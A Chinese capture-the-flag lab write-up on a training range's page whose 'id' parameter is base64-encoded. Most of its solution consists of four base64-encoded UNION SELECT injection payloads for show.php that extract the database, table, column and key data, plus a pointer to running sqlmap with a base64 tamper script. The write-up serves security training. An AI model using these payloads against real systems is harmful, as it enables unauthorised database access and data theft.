0x00.题目描述:
背景介绍
网站维护人员在WEB目录中放了一个可能存在漏洞的页面。
安全工程师“墨者”负责对该页面进行安全测试,看是否存在安全漏洞影响网站及服务器的运行。
实训目标
1、了解并熟练使用手工SQL注入;
2、了解MySQL的相关知识;
3、了解SQLMAP的使用及其tamper插件的使用;
4、了解base64编码及解码。
解题方向
参数通过base64编码后传输,然后根据相关提示进行测试。
0x01.解题思路:
靶场环境:
手工注入:
将主界面用burpsuite拦截下来,做测试用。
可以看到,id后面的参数为MQo=,使用了base64编码,解码得到id的值为1,使用or 1=1测试可行,可知这是一个注入点。
后续的注入都需要将URL先进行base64编码,其余的和数字注入并无区别。
爆数据库名payload:/show.php?id=MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCkKCQk=
爆数据库表名payload:/show.php?id=MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSd0ZXN0JwoJCQ==
爆列名payload:/show.php?id=MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3Rlc3QnIGFuZCB0YWJsZV9uYW1lPSdkYXRhJwoJCQ==
爆字段payload:MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh0aGVrZXkpIGZyb20gZGF0YQoJCQ==
拿到key
sqlmap注入:
sqlmap的话,加个base64encode脚本跑一跑就可以。
0x02.总结:
1.和数字型注入差不多,就是将注入语句先用base64编码进行转码。